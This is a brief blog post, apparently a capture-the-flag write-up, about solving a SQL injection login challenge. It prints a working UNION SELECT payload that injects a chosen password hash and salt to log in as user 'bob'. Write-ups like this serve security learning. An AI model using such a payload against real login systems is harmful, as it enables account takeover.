This challenge had a rather interesting SQL Injection vulnerability. My first train of thought brought me to trying to modify a password or insert and extra record, but that was made difficult by the disabling of multiqueries on the server. The solution was ended up being a pretty cool UNION query in SQL where you tell the database which exact strings to select from the database. All you needed to do was hash your own password + salt (mine was "password"+"abcdef"). The solution is shown below.
bob' UNION SELECT ID, '1a7d8a297d27da26806a242253747eb89335a487b017889173cbe73e33ca2ecd', 'abcdef' from users where username='bob' --
-- suntzu_II
No comments:
Post a Comment